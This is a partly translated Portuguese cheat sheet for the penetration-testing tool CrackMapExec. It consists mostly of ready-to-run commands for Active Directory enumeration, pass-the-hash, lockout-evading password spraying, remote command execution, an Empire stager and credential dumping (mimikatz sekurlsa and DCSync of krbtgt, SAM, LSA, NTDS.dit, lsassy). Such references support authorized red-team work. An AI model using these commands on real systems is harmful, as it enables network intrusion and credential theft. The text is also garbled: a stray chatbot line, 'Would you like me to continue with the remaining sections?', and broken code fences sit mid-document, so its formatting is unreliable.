Folha de Dicas do CrackMapExec
Visão Geral
CrackMapExec (CME) é uma ferramenta de pós-exploração projetada para testes de penetração e operações de red team em ambientes Windows/Active Directory. É frequentemente descrito como uma “canivete suíça” para testes de penetração de rede, permitindo enumeração, teste de credenciais e execução de comandos em múltiplos protocolos.
⚠️ Aviso: CrackMapExec é uma ferramenta de teste de segurança que deve ser usada apenas em ambientes onde você tem permissão explícita para fazê-lo.
Instalação
Usando pipx (Recomendado)
# Install pipx if not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath
# Install CrackMapExec
pipx install crackmapexecNo Kali Linux
sudo apt update
sudo apt install -y crackmapexecDo GitHub
git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry installUsando Docker
docker pull byt3bl33d3r/crackmapexec
docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexecUso Básico
Sintaxe Geral
crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]Protocolos Suportados
smb: Server Message Blockwinrm: Windows Remote Managementldap: Lightweight Directory Access Protocolmssql: Microsoft SQL Serverssh: Secure Shellrdp: Remote Desktop Protocolftp: File Transfer Protocol
Especificação de Alvo
# Single target
crackmapexec smb 192.168.1.100
# Multiple targets
crackmapexec smb 192.168.1.100,192.168.1.101
# IP range
crackmapexec smb 192.168.1.1-255
# CIDR notation
crackmapexec smb 192.168.1.0/24
# From file
crackmapexec smb targets.txtMétodos de Autenticação
Nome de Usuário e Senha
# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'
# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator,user1 -p 'Password123'
# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123','Welcome1'
# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txtPass-the-Hash
# NTLM hash
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'
# Multiple hashes
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'
# From file
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txtAutenticação Local
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-authAutenticação de Domínio
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAINComandos do Protocolo SMB
Enumeração Básica
# List shares
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares
# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users
# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users
# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups
# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups
# Get domain password policy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol
# Check for SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txtExecução de Comando
Would you like me to continue with the remaining sections?```bash
Execute command
crackmapexec smb 192.168.1.0/24 -u administrator -p ‘Password123’ -x ‘whoami’
Execute PowerShell command
crackmapexec smb 192.168.1.0/24 -u administrator -p ‘Password123’ -X ‘$PSVersionTable’
### File Operations
```bash
# List files in share
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern '*.txt'
# Download file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --get-file 'C:\temp\file.txt' /tmp/file.txt
# Upload file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --put-file /tmp/file.txt 'C:\temp\file.txt'WinRM Protocol Commands
Basic Enumeration
# Check WinRM access
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123'Command Execution
# Execute command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'
# Execute PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'LDAP Protocol Commands
Basic Enumeration
# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain
# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users
# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups
# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers
# Get domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol
# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trustsAdvanced Enumeration
# Search for specific attributes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq -o ATTRIBUTES=description
# Search for unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation
# Search for constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate
# Search for ASREP roastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt
# Search for kerberoastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txtMSSQL Protocol Commands
Basic Enumeration
# Check MSSQL access
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'
# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases'Command Execution
# Execute command
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'
# Execute query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version'Module Usage
Module Management
# List available modules
crackmapexec <protocol> --list-modules
# Get module options
crackmapexec <protocol> -M <module> --options
# Use module
crackmapexec <protocol> <target> -u <username> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2Common Modules
Mimikatz
# Dump credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'
# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'
# Get SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'
# Get DCSync
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'Empire
# Generate Empire stager
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=httpPowerView
# Run PowerView commands
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'BloodHound
# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=AllLsassy
# Dump credentials using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassyEnum_DNS
# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dnsGOAD
# Get objects and attributes from domain
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goadAdvanced Techniques
Password Spraying
# Spray single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'
# Spray multiple passwords against single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt
# Spray with jitter to avoid lockouts
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10Credential Harvesting
# Dump SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam
# Dump LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa
# Dump NTDS.dit
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntdsDatabase Operations
Initialize Database
crackmapexec smb 192.168.1.0/24 --databaseView Database
# List hosts
crackmapexec smb --database -L
# List credentials
crackmapexec smb --database -C
# Use credentials from database
crackmapexec smb 192.168.1.0/24 --database -id 1Common Options
| Opção | Descrição |
|---|---|
-h, --help | Mostrar mensagem de ajuda e sair |
-t THREADS | Definir número de threads concorrentes (padrão: 100) |
--timeout TIMEOUT | Definir timeout para conexões (padrão: 5 segundos) |
--verbose | Ativar saída detalhada |
--debug | Ativar saída de depuração |
--continue-on-success | Continuar tentativas de autenticação mesmo após o sucesso |
--no-bruteforce | Sem força bruta, apenas use as credenciais fornecidas |
--fail-limit LIMIT | Número de tentativas de login com falha antes de desistir de um host |
--jitter JITTER | Adicionar atraso aleatório entre tentativas de autenticação (em segundos) |
--local-auth | Autenticar usando contas locais em vez de domínio |
-d, --domain DOMAIN | Domínio para autenticar |
--no-output | Não exibir saída |
--output-file FILE | Gravar saída para arquivo |
--log | Ativar registro em arquivo (padrão: ~/.cme/logs/) |
| Opção | Descrição |
|---|---|
--shares | Listar ações disponíveis |
--sessions | Listar sessões ativas |
--disks | Listar discos |
--loggedon-users | Listar usuários conectados |
--users | Listar usuários de domínio |
--groups | Listar grupos de domínio |
--local-groups | Listar grupos locais |
--pass-pol | Obter política de senha |
--rid-brute [MAX_RID] | Enumerar usuários por força bruta de RID |
--sam | Dump hashes SAM |
--lsa | Extrair segredos do LSA |
--ntds | Despejar NTDS.dit |
--exec-method \\{smbexec,wmiexec,mmcexec,atexec\\} | Método para executar comandos |
| Opção | Descrição |
|---|---|
--users | Listar usuários de domínio |
--groups | Listar grupos de domínio |
--computers | Listar computadores de domínio |
--domain | Obter informações de domínio |
--pass-pol | Obter política de senha |
--trusts | Obter confianças de domínio |
--asreproast [OUTFILE] | Obter usuários AS-REP roastable |
--kerberoasting [OUTFILE] | Obter usuários kerberoastable |
--trusted-for-delegation | Obter usuários/computadores com delegação irrestrita |
--allowed-to-delegate | Obter usuários/computadores com delegação restrita |
| Opção | Descrição |
|---|---|
--port [PORT] | Porta WinRM (padrão: 5985) |
--ssl | Use SSL para WinRM |
| Opção | Descrição |
|---|---|
--port [PORT] | Porta MSSQL (padrão: 1433) |
-q QUERY | Executar consulta SQL |
| https://github.com/byt3bl33d3r/CrackMapExec# |
Recursos
- Repositório Oficial do GitHub
- Wiki do CrackMapExec
- Guia de Instalação do CrackMapExec
- [Documentação de Módulos do CrackMapExec](